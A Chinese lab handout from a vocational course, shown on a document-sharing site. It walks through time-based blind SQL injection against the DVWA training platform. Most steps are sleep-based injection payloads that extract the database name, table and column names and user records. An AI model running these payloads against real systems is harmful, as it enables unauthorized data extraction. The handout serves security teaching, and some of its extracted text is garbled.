付费下载
下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、言1言息宜至与管理专皿兼学资腼库实训I SQL注入(时间盲注)1一、实训目的1 . 了解SQL注入的常用方式2 .掌握SQL时间盲注的方法二、实训环境1. DVWA平台2. Firefox浏览器(谷歌浏览器)三、实训内容1 .配置DVWA平台进入DVWA平台,选择DVWA Security ,将安全级别设置为Low。2 .测试SQL注入点(1)点击SQL Injection (Blind),进入测试页面。(2)使用参数1' and sleep(5) # 进行提交,页面明显延迟。使用参数1 andsleep(5) #进行提交,页面没有延迟。说明是基于字符的时间盲注。(3)猜解数据库名的长
2、度。具体命令如下:/明显延迟? 1' and if(length(database()=1,sleep(5),1) #/ 没有延迟1' and if(length(database()=4,sleep(5),1) #(4)二分法猜解数据库名。具体命令如下:八言息我至与管理专皿裁学费腼每? 1' andif(ascii(substr(database(),1,1)>97,sleep(5),1)#/明显延迟? 1' andif(ascii(substr(database(),1,1)<100,sleep(5),1)#/没有延迟? 1' andif
3、(ascii(substr(database(),1,1)>100,sleep(5),1)#/没有延迟修改substr函数的第二个参数,如substr(database(),2,1) 进行测试,可以 获得数据库的第二个字母。(5)猜解数据库表的数量。具体命令如下:? 1' and if(select count(table_name)frominformation_schema.tableswheretable_schema=database() )=1,sleep(5),1)#/ 没有延迟? 1' and if(select count(table_name)fromi
4、nformation_schema.tableswheretable_schema=database() )=2,sleep(5),1)#/ 明显延迟(6)猜解数据库表名的长度。具体命令格式如下:/没有延迟? 1' and if(length(substr(select table_name from information_schema.tables where table_schema=database() limit 0,1),1)=1,sleep(5),1) #言1言息宜至与管理专皿兼学资腼库1' and if(length(substr(selecttablename
5、frominformation_schema.tables where table_schema=database()limit 0,1),1)=9,sleep(5),1) #/ 明显延迟table_name from(7)猜解数据库表的名称。具体命令格式如下:1' and if(ascii(substr(selectinformation_schema.tables where table_schema=database() limit 0,1),1,1)>103,sleep(5),1) #/ 没有延迟? 1' and if(ascii(substr(select ta
6、ble_name from information_schema.tables where table_schema=database() limit 0,1),1,1)<103,sleep(5),1) #/ 没有延迟重复上述步骤,猜解出两个表名。(8)猜解数据库表中的字段长度。具体命令格式如下:? 1' and if(select count(column_name) frominformation_schema.columnswhere table_name='users')=1,sleep(5),1)#/ 没有延迟1' and if(selectco
7、unt(column_name)frominformation_schema.columnswhere table_name='users')=8,sleep(5),1)#/ 明显延迟(9)猜解数据库表中的字段名称。具体命令格式如下:言1言息宜至与管理专皿兼学资腼库1' and if(ascii(substr(selectcolumnnamefrominformation_schema.columns where table_name= 'users' limit 0,1),1,1)>117,sleep(5),1) #/ 没有延迟1' an
8、d if(ascii(substr(select column_name from information_schema.columns where table_name= 'users' limit 0,1),1,1)<117,sleep(5),1) #/ 没有延迟(10)猜解表中的数据。具体命令格式如下:1' and if(select count(first_name) from users)=5,sleep(5),1) # /明显延迟users表中的字段数为5猜测每条记录的长度。说明巾rst_name的第一个值得长度为5个字符。? 1' and if(length(substr(select first_name from users limit 0,1),1)=5,sleep(5),1) #/ 明显延迟(11)二分法猜解表中的数据。具体命令格式如下:?1'andif(ascii(substr(selectfirst_namefromuserslimit0,1),1,1)&g
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2026年自动化项目规划与管理
- 2026年小学语文课堂教学流程设计方案
- 2026年足浴店营销活动策划
- 2026年财务部年度工作报告
- 2026年养殖场安全排查活动
- 2026年农村中学数学教学现状研究综述
- 上海农林职业技术学院《智能传感材料与结构》2026-2027学年第一学期期末试卷含解析
- 宁波诺丁汉大学《三维可视化技术》2026-2027学年第一学期期末试卷含解析
- 某造船厂船体焊接工艺办法
- 食品厂清洗消毒规则
- 【重庆专用】期末模拟卷(一)- 2025-2026学年八年级语文下学期同步备考模拟卷(统编版)(原卷版)
- 电力施工三防十要安全培训课件
- 餐饮服务流程标准化及员工培训教材
- 广东2026年第一期物业管理师职业技能等级认定(技能实操) 试题解析及核心考点
- 2026年安徽省合肥市九年级英语下册期末考试试卷及答案
- 2026建投河北热力有限公司公开招聘12人笔试参考题库及答案详解
- 2026重庆市属事业单位第二季度公开招聘工作人员442人考试参考题库及答案解析
- 高频面试问题+答案(职场+各行业专属2026)
- 2026年上海闵行区中考二模语文模拟试卷试题(含答案详解)
- 2025年四川省委党校在职研究生《政治理论》历年参考题库(含答案详解)
- 2026年河南省信阳市八年级地理生物会考试题题库(答案+解析)
评论
0/150
提交评论